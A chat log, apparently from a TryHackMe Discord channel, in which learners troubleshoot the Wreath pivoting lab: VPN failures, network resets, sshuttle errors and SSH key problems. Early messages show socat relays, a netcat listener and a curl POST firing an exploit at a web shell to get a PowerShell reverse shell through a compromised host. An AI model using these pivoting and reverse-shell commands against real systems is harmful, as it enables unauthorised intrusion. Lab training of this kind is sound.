also with this, you have the exploit already uploaded to the .150, your simply using that exploit to run your powershell command, so dont use the prod-serv to run your command. also, yes socat on the prod-serv, but not on kali, you just need a simple listener on your kali so maybe netcat would be better to connect to

If I have understood correctly I am doing :

1. On my local machine

nc -lvnp 9876

2. On Prod-Serv :

./socat-shikyo tcp:LOCAL_IP:9876 tcp:10.200.181.150:80,fork

3. On my local machine

Curl -X POST http://10.200.181.150:80/web/exploit-toto.php -d "a=X"

X the exploit proposed by THM with IP: IP_Local Port: 9876

(Sorry for the rough English)

Yes just make sure that port is opened on the Prod-Serv firewall

Otherwise it wont work

There is something I don't understand. It is not possible to do this without opening a port on Prod-Serv ?

I'm trying to do this with the "Port Forwarding -- Quiet" technique in Task13 Pivoting Socat.

Ahhhh okay that is a whole different story

I missed that in your first post my apologies

No problem. It's very kind of you to help me 😄

So then looking at this one, double check your socat commands on the machines compared to the THM task. Seems you have something that is off

I will try again.

1. on my local machine

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

2. On Prod-Serv

./socat tcp:My_Kali_IP:8001 tcp:10.200.181.150:80,fork &

If I understand correctly here we have a link between my local machine on port 8001 and 10.200.181.150:80. And on my local machine what comes from Git-Serv will be sent on port 8000 through 8001.

3. I use curl to run the exploit with kali's ip and port 8001?

I don't quite understand how I'm going to get the reverse shell. I'm not sure how I'm going to get the reverse shell, is Socat doing the same thing as netcat and opening it for me?

The reverse shell comes from the exploit that your running. The powershell command is what is gonna connect back and give your RCE of the git server

Ok

I'll put you in screen what I did because I don't understand why I don't communicate with Git-Serv.

Your socat on your prod-serv is wrong. You want your TARGET IP. Not the IP you already have access to

OMG I'm so stupid

Rerun it, then check your localhost:8000 on your kali

Yes (I forgot to add time to the machine, so it's working again)

😄

there ya go

Thank you. Now I have to get the shell back ^^

Is it normal that the connection is not stable?

not stable to/on what?

I went away for a few minutes and when I came back the socket was broken.

If I try to redo the link: I get this error

Ok if I change the port it works

assuming someone messed with the wreath boxes? was fully connected doing my thing and all of the sudden lost connection to everything, now getting a ssh: connect to host 10.200.84.200 port 22: No route to host

is voting for a reset and waiting the only thing that can be done?

yes unless some other user still on the box fixes it.

Hi, can I move somehow to simple cmd in the evil-winrm?

hello I am a subscriber, im new and I opened wreath to see what its like and it says "9 days of access left"? will I be able to reset that? i wouldnt have started it if I knew it was limited, and I didnt think it would be limited as a subscriber

"Joining the network requires a 7 day streak or a subscription to TryHackMe. To limit the number of networks which have to stay active at any one point, network access will last for 10 days after joining, at which point you will be automatically be removed; however, rejoining does not require a streak so if you didn't manage to finish within the ten days, you are free to rejoin immediately and keep at it from where you left off. Progress will not be reset."

You can join after the ten days period without losing the progress in the room, but make good notes so you can replicate your steps in the network easily

If you aren't going to start working on it now, you can just leave the room and join again when you want to focus on the room to get the full 10 days for that

thanks

*sigh*

-ban @limpid sluice -ddays 1 Compromised Account -- Nitro Scam

🔨 Banned Hsehwag#9276 indefinitely

I'm old and slow, okay??

😆

it's not limited in the sense that you can never re-join it again. It's just a thing with how access to networks (like throwback where you have to pay for x access) are displayed. If you're eligible for Wreath you'll be able to join it again as long as you're still eligible (i.e. a subscriber)

your questions and answers will carry over and remain if you re-join

(I think you'll just get thrown onto a different wreath network if you re-join after the access timer? Which'll mean needing to download a new VPN file that new network you get placed onto)

If you're lucky

'eh yeha

it just depends on how many others are doing wreath

If you're very unlucky you'll get the same network

could be a good thing if you've got your environment and notes setup for a specifc network

could be a bad thing if there's a few bad eggs on the network

swings and roundabouts really

Is wreath broken? I'm trying to reach the webserver via the resolved name and it is not loading at all. I am able to ping prod-serv on the terminal so it is alive

Wreath is down ?

I am connected with openvpn and I can't communicate with prod-serv. The network status is "Running".^I regenerated the openvpn file and tried again with the new one, still the same problem. Have you ever had this problem?

When I try to connect via ssh I get this error message

And when i ping .200

And I have the same problem with the attackbox T_T

are you using udp or tcp?

try using a different region aswell

Ok I will try

For wreath there is no possibility to change region?

Does changing the region on the Machines tab have an impact?

yep

ok

u did regen it ?

There are no regions for wreath

No. It does not change Networks.

wait really?

:o

i'm such an idiot >.>

xD

https://github.com/tryhackme/openvpn-troubleshooting

try using the openvpn-troubleshooting for thm

I will try

Yea, really. Regions are for the standard THM VPN only. It also doesn't change where the VMs are deployed, they're always in Europe.
Networks are all in that region.

😭

(Great tools)

I have to change chanel to ask for help in site-bugs?

#site-support or here.

The final test WILL FAIL on Network VPNs rather than standard VPNs.

It's designed for standard THM VPN connections not networks.

ok but it still looks like a problem with the VPN ?

Please post again but without redacting IP addresses. It's difficult to troubleshoot with those redacted.

They are not sensitive information, or at least they very much shouldn't be

Ok thanks. I'm going to poke around in tech-support.

Here is fine and honestly probably better

ok

Connection with OpenVpn

ssh connection to the compromised machine

Attempt to ping the compromised machine

Have you reset the network?

Not this week. I reset it a few days ago and had no problem afterwards.

Do I have to do the applications for reset?

hi guys, I'm trying to read the contents of id_rsa and it's turning out blank, do we need to reset the network?

How did you try to read it? And do you have perms to?

I'm a root user and I tried to cat it and use nano and vi. All of them turned out blank

If it’s the machine on the network your trying to read it probably needs a reset someone might’ve deleted it by accident

Is anyone running into issues at the start of wreath connecting to the webserver in-browser. I have added the resolved hostname to /etc/hosts, but when I load the domain, it hangs

Seems like the network is fucked up ! cannot interact with gitserver.thm nor ping it.

Python exploit does nothing aswell and ... we have only 4/8 agreed to reset the box 😦

and discovering hosts through the first machine (with the -sn flag) asks for 53 minutes. WTF

The only thing I can do is surfing on the webpage (thomaswraith) adn ssh into the 1st machine.

waiting for a reset...

The first machine is the only one for the python exploit so if you can ssh into it that’s good

anyone else having problems with ida_rsa key working in the "WREATH" room? i copied the key, made sure there were no spaces. pasted it into an id_rsa on my kali machine, gave it chmod 600 and tried the ssh -i id_rsa and keep getting publickey permission denied

@echo spruce it hanged on me to. i took a few minutes then it just worked.

Nope, just connected to it thanks to pwncat and worked like a charm

Gave +1 Rep to @wide canyon

Oh, I’ll look into pwncat. Thank you. I just don’t know why Im getting permission denied using the ssh -i method. @frosty barn

Gave +1 Rep to @frosty barn

Delete your actual id rsa, just re-download it and give it a chmod 600. No need to open it to remove anything. Then try to connect to the machine with pwncat : "connect root@IP -i id_rsa" then CTRL+D to switch from local shell to remote shell as root@prod-serv

i figured out the problem was actually using sublime text editor...? why did this stop the id_rsa from working? when I made the same exact key file using gedit the id_rsa key worked

i gave them both chmod 600 and the gedit worked while the sublime didn't

while creating it with sublime i get this error trying to ssh "Load key "id_rsa": invalid format
root@10.200.57.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."

but with gedit, i get no errors

hmm ok i fixed it for use with sublime. It just needs a newline character which is weird. I just had to hit enter at the end of -----END OPENSSH PRIVATE KEY-----giving it a blank line at the end. i was able to ssh with this id_rsa using sublime. with gedit i did not have to do this. worked fine ssh'g using the id_rsa.

Im having troubles with the nmap scan

The prod-servers ip is 10.200.81.200

you downloaded the website, not nmap itself

thanks, I should've tested the binary before using it

Gave +1 Rep to @humble jewel

Hi All, Unable to reach the Prod-Server -> 10.200.87.200

Anyone facing this issue ? Need Help !

if you were in active then it will stop the server and you'll have to start it up again. make sure you started the wreath vpn

Hey everyone. I'm stuck in the wreath network when I try to use sshuttle. I tried to find the error message everywhere on the internet, but I did find anything... Here is the logs. Does anyone already encountered this error ?

└─# sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.81.200.0/24 -x 10.200.81.200 c : Connected to server. Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found. fw: Received non-zero return code 1 when flushing DNS resolver cache.

Here it is with a -v

─# sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.81.200.0/24 -x 10.200.81.200 -v Starting sshuttle proxy (version 1.1.0). c : Starting firewall manager with command: ['/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall'] fw: Starting firewall with Python version 3.9.12 fw: ready method name nat. c : IPv6 enabled: Using default IPv6 listen address ::1 c : Method: nat c : IPv4: on c : IPv6: on c : UDP : off (not available with nat method) c : DNS : off (available) c : User: off (available) c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort): c : (<AddressFamily.AF_INET: 2>, '10.81.200.0', 24, 0, 0) c : Subnets to exclude from forwarding: c : (<AddressFamily.AF_INET: 2>, '10.200.81.200', 32, 0, 0) c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0) c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0) c : TCP redirector listening on ('::1', 12300, 0, 0). c : TCP redirector listening on ('127.0.0.1', 12300). c : Starting client with Python version 3.9.12 c : Connecting to server... s: Running server on remote host with /usr/bin/python3 (version 3.6.8) s: latency control setting = True s: auto-nets:False c : Connected to server.

fw: setting up. fw: ip6tables -w -t nat -N sshuttle-12300 fw: ip6tables -w -t nat -F sshuttle-12300 fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300 fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300 fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp fw: iptables -w -t nat -N sshuttle-12300 fw: iptables -w -t nat -F sshuttle-12300 fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300 fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300 fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 10.200.81.200/32 -p tcp fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 10.81.200.0/24 -p tcp --to-ports 12300 Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found. fw: Received non-zero return code 1 when flushing DNS resolver cache.

Do you have the service running?

Lots of fixes on google for that actual error

Seriously ? I couldn't find anything yesterday...
I'm not sure about the service, I'll check that....

Seems like I had brain issue yesterday

Thank you for the help, I'll check that

@strange bison

-ban @surreal sail Nitro Phishing. Please secure your account and appeal this ban by emailing bans@tryhackme.com

🔨 Banned abdobzxart#6401 indefinitely

I see that the room is locked? Is this for updates?

In Wreath?

Shouldn't be?

hm its not showing it now just did earlier for some reason

How do i fix the connection to wreath? it says its up and running and im connected to the access page but when i ping it, it says unreachable. it happened after being inactive

i tried restarting the thm vpn and wreath vpns. logged out of thm and redownloading new wreath config files

i feel like 8 people to reset is to many. it seems to crash and hang around this time the past few nights and its barely 3/8

You only need wreath vpn. You don’t need the regular one. Connect to the wreath vpn only and try again. It’s maybe conflicting.

vin the wreath network, when trying to connecct over rdp to the gitserver, what should be my tunneling command considering i require a second tunnel for taking RDP on port 8985 of the git server? i amusing port forward technique since sshuttle does seem to be exactly compatible with WSL2 (let me know if that's not the case)

in*

This is the error when i try establishing a tunnel using sshuttle

sshuttle -r root@10.200.84.200 --ssh-cmd "ssh -i id_rsa" 10.200.84.0/24 -v
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
[local sudo] Password:
fw: Starting firewall with Python version 3.9.12
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '10.200.84.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.9.12
c : Connecting to server...
ssh: connect to host 10.200.84.200 port 22: No route to host
c : fatal: failed to establish ssh session (2)

with -x argument, same result

sshuttle -r root@10.200.84.200 --ssh-cmd "ssh -i id_rsa" 10.200.84.0/24 -x 10.200.84.200 -v
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
fw: Starting firewall with Python version 3.9.12
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '10.200.84.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '10.200.84.200', 32, 0, 0)
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.9.12
c : Connecting to server...
ssh: connect to host 10.200.84.200 port 22: No route to host
c : fatal: failed to establish ssh session (2)

now i am getting an error 99, which intially made me think sshuttle is not compatible in WSL2

I think, I was still using wsl2 when I did wreath and didn't have problems with sshuttle
Your error message: ssh: connect to host 10.200.84.200 port 22: No route to host indicates that either you are not connected to the wreath vpn or the network state is not running, so those would be my first troubleshooting steps to check that the vpn is working, the network is running and then can you ssh normally to the 10.200.84.200 machine

Hi, I dont know if its as easy as your syntax being incorrect where your using the id_rsa. Do you have the correct folder path?

I had the ssh key in my usual .ssh folder, the syntax I used was, as follows...
"ssh -i ~/.ssh/id_rsa"

Full command;
$ sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i ~/.ssh/id_rsa" 10.200.105.0/8 -x 10.200.105.200

@opal viper nope. still not working. it's actually still running from last night as well. even after closing my vpns and starting back up

I'am experiencing the same issue as @wide canyon , I was focus, forgot about extending, the network was paused, i started it again and now everything is unreachable. (of course i'am connected to the VPN and network is in running state)

@fading saffron Hi bro , did you fix the issue with sshuttle , what was the solution ? Kindly let me know , i tried starting and stopping lots of services

Hey! I fixed it, let me check how

@fading saffron yes please let me know stuck on that since yesterday

I just restarted the systemd-resolved.service

I used that https://andjey.info/how-to-flush-the-dns-cache-on-debian-10/

okay , will give it a shot

thank you

I have used that solution , it says systemd-resolve does not exist , i have installed systemd , but not sure i am able to find systemd-resolve

@fading saffron thank you , it resolved Used this thing : sudo systemctl enable systemd-resolved.service

Gave +1 Rep to @fading saffron

any one can help to vote wreath reset, I can't access prod-serv now

Current status Reset (7 / 8)

@long crystal if you're asking for w reset, you need to state what instance you're on

instance: prod-serv (10.200.73.200)

I have linked to wreath network, but I can't access prod-serv instance

I'm having connection issues too. The server stopped so I restarted it, and now all of the ports on it are filtered. Tried reconnecting to the VPN and whatnot. I seem to also be on a different instance because unfortunately mine is at 1/8 for reset...

Oh well, so much for getting more done with the Wreath network before work... time for me to go.

Hello!
I can't connect via ssh using id_rsa in the wreath network on the first machine: 10.200.87.200 permission denied (publickey)

Same

Someone messed up with the ssh authorized_keys file it replaced the legit public key with his own but even worst he messed with system permissions

even as root you can't edit the file anymore

Yess

This is annoying

Please vote to restart network

Already did it. But if nothing prevent that troll to mess things up again tho.

Is 1/8

:(((

You can fix that with attributes

2/8

chattr -i file to make it editable again

If you're asking for a reset, please make aure you specify what network you're on as there's lots of instances

Now is 2 auth keys :))

I'll give it a try. I didn't know about chattr thanks

Gave +1 Rep to @strange bison

how to figure out where they are, just write wreath?

The third octet of the network OP addresses

87

So you should ask people to help you reset .87.x

Oke, thx man !

I fixed the file now you can log again with ssh

Thxx man

could any one please reset the 10.200.87.x networrk if you are on it .

@stoic flicker@strange bison

@strange bison

-ban @surreal sail -ddays 1 Nitro phish

🔨 Banned bip boup oui tutut#0388 indefinitely

Sorry was driving

@steady isle

-ban 473699796650033162 -ddays 1 nitro phishing

🔨 Banned 473699796650033162 indefinitely

I just finished this room. It was a great room to learn and brush up on pivoting. It was very well explained.

Task 20 - Hi everyone, has anyone come across this before when running the exploit to pivot inside the network, see output below? I have tried using the old script from the ExploitDB but that didn't work. Using t the new script pinned to this thread the script began to run but then stopped as you can see below:

: [+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository git-newBie.zip
[+] Add user to repository
[-] Cannot add user to repository

All good now. I think the network had a reset.. 🤔

Wreath 10.200.87.x is unreacheable

From my kali and attack box

Mod help!!!

Mods are not support staff and do not control the site

Who can help me ?

At the moment? No one

Please show everyone more details about the issues you're having

Host is unreachable

Please show the output of your OpenVPN command

I don't have more info

Not work even attack box :))

Also be aware that you cannot connect to the Wreath VPN if you are a subscriber with the attackbox running, as the attackbox uses your VPN config file.

This is problem :))

Please show the output of your OpenVPN command.

Wait

Yeah man i'm subscriber

You cannot have the attackbox running if you are trying to connect to the Wreath VPN from your own machine

They will conflict

What ?

Please clarify your question

what I'm trying to tell you is that neither my kali and attackbox can't access 10.200.87.x

Yeah, I understand that.

I did not question that.

I am telling you that you cannot have the attackbox running if you are attempting to connect to the Wreath VPN.

my openvpn output

its normal

Do you have the attackbox running at the moment?

No

Why, there are 2 different ip addresses?

No, they're not.

The attackbox uses the same VPN configuration file (and thus the same IP address) as the file you download.

Let me check

Wreath is not on the regular tryhackme network, thus the attackbox also requires an OpenVPN connection.

There is nothing to check.

This is fact.

:))

Know that what you are saying is wrong, because in all the rooms where I used 2 machine they had different ip addresses.

No, it is not wrong. You just do not understand how it works.

The attackbox will have multiple IP addresses.

Bro

I'm not your bro.

Yeaahh

Finaly

You're arguing and clearly don't want help. I'm going to stop trying.

Multiple at the same time.

One of them is your Wreath IP.

Now i have 10.10.226.88

Arguing with someone when they are trying to help you is just rude

At attack box

This is how it works. I beta tested all of the TryHackMe networks and I have encountered this issue myself.
Arguing with the help you are asking for, especially when you do not understand how it works, is incredibly rude and also against the rules.

I apologize for my rude behavior, I know it's not your fault that the network doesn't work sometimes, but I get aggressive when I want to finish something and it doesn't work, yes and you're right in everything you said I didn't check "ipconfig" when I said he has another ip in that network. I apologize one more time!

I encountered a problem after running this command "firewall-cmd --zone = public -add-port 12123 / tcp", does anyone have any advice?

10.200.87.X

hello

anyone here to help ?

If you ask your question directly, someone will help when they can. Until they know the issue, they don't know if they can help.

Does the wreath network break a lot? I've had connection issues over the last couple of days. Cannot ping the production server anymore.

The machines themselves are stable. People you're sharing the network with can be dicks though

It's just a annoying when you make time to work THM and then network doesn't work. Seems to happen often. Three hours later now I'm getting connectivity to prod serv.

Yeah, I agree -- it's annoying, but I can't think of a solution for it I'm afraid

People are always gonna be asshats

Allow paying for private instances

I would pay extra for sure

That's already allowed

See here

Message is also pinned

Not convenient though

Nope, it is not, but it's available

Oh cool. I didn't know that. Any idea how much it is?

Not a clue I'm afraid. That'll take you straight to the big boss (Skidy)

👍

ok, so wreath network stopped working. can no longer ssh into initial box

exploits both on msf, and script do not connect to box

Does redownloading the connection pack ever solve the problem? Not sure if that puts you on a different set of boxes or not

you can choose a different access pack, but that would put me in the EU netwrk

i mean... i guess i can try that.

No, it won't change what set of boxes

No, it won't. Wreath doesn't have regions.

right, just checked. it doesn't

wulp, the network is busted.

I'm still connected and ssh'd to prod server

well lucky you... vote to reset it lol

done

Remember, you aren't likely to be on the same instance

If you're asking for a reset, state the third octet of the network IPs, that indicates what instance

81

85

oh

well shit

Another expert tip is that you can add a vote to reset every hour

👍

Since the network is down for you. Have you heard about "The Cyber Plumbers Handbook", it's now a free ebook that covers a lot of material. I'm working my way through it now as well. Really in depth. https://github.com/opsdisk/the_cyber_plumbers_handbook

The definitive guide to Secure Shell (SSH) tunneling, port redirection, and bending traffic like a boss

annnnd it's back.

yeah i'll check it out. i tend to be decent at it already just doing wreath as a warmup before starting OSEP prep

lots can go wrong with tunneling

@static elk nitro scam

-ban @merry spear -ddays 1 Sending phishing scams

🔨 Banned lugia#3177 indefinitely

I am trying to do wreath right now but I am stuck at the password hash question

I believe someone changed the password because the hash does not line up

hey all

is anybody on the machine currently ?

Remember there's lots of instances

I'm in the starter zone, task 5

vpn is fine, tried reconnecting twice, no attackbox turned on, tried resetting

can't ping host , unresponsive

Ping isn't the best test of "is the remote machine alive"

I was following the official THM video for help, also I was able to pull off a scan, changing the /etc/hosts file to fix the dns and still couldnt reach the webserver

I'm new to this, so any hint would be appreciated

Ill figure it out

I can't use the web exploit on 10.200.81.200
it shows
Failed to connect to http://10.200.81.200:10000/
pls help

Can you connect to it in your browser?

I don't kown if helps, but I had an error too, I need to config the vpn (https://tryhackme.com/access) to have access from my local browser. The another option is use the attackerbox from tryhackme.

make sure you use the vpn for wreath network and not the usual one.

same issue here , i think it's problem with thm network, I'm using wreath vpn and pinging the machine is working and modified hosts file.

hey, just started with wreath network, and not able to ping the network. And not able to access the website http://wreath.thm

Regenerated the vpn file many time, still the same issue

Am I missing something?

Did you add it to your hosts file?

Are you using the wreath specific VPN?

yes

added to host and download the wreath vpn file

Downloaded it, but are you using it?

yes

What do you mean by "not able to access?"
Can you show us exactly what you see?

i have a separate directory for that

\

http:// or https:// ?

And can you portscan/ping?

https://

no

can't ping and port scan

now I can ping, the network has reset and got the new ip when i reloaded the page

The IPs of the network boxes should absolutely not change unless you change instance

no when i joined the IP was 10.200.71.200 and now it's diff

and I joined 1 hr ago

Yeah that's not meant to happen

Hey, This must me -D. Right?

Task 11: almost last line

No, it's saying it's similar. It's not saying use -D

having this error while running socat.

Downloaded the binary with this like https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat , which is provided

Am I doing something wrong?

I completed the Wreath Network Room 😄

congrats! : D

Network might need a reset, can't connect to the machines.

Can't download my wreath vpn config, keep getting a 404.. :/

rooted, and with that, all of the networks have been rooted! a lot of fun and new techniques here! 😄

Still a 404 when downloading vpn config, anyone facing similar issues?

When launching the attackbox, the vpn config inside it is 0 bytes...

@strange bison is this something up your alley?

Please remember that mods are not support staff.

Or tryhackme staff for that matter.

So, no..

Saw you helping some people out, figured I'd give it a shot

@merry robin ?

I just finished Wreath, kudos to the author of this network! I've leant TONS of new stuff during the process, especially in pivoting🔥

What is the root user's password hash? /etc/shadow has a hash. but that does not work

this does not seem match in the room $6$5IFHGBT1.Z/3EnOs$2GVIAaESdFIXnVdTd<xyz>Fq2cgyYwYzgfB.uY2gxH2dXNiB34YMs9gFpP3UvsQOJ.MkqMP2ZlX.

As a general rule, dumping potential answers in a public chat with no spoilers tends to be a bit of a no-no, just so you're aware 🙂

As it is, you are correct, some moron has decided to change the password hash. Reset the network and it will go back to what it should be

Understood

I hope someone adds on to the reset.

You can add another vote every hour

I'm getting 404 when I try to download openvpn config file for this network:( How to fix this?

This ^

Same issue here for 2 days now

daaamn

That's a known issue -- has been for a while unfortunately.
The site staff are aware of it, but as yet there hasn't been a working fix released.
I believe there might be a workaround floating about (@strange bison, if anyone knows, it'll probably be you 🙂 )

Isn't it just leave and rejoin?

Could well be 😆

@timber marlin @noble nebula try leaving the room and rejoining

Soo.. when I asked if you could be of any help 2 days ago, you said "im a mod not support staff" instead of this :/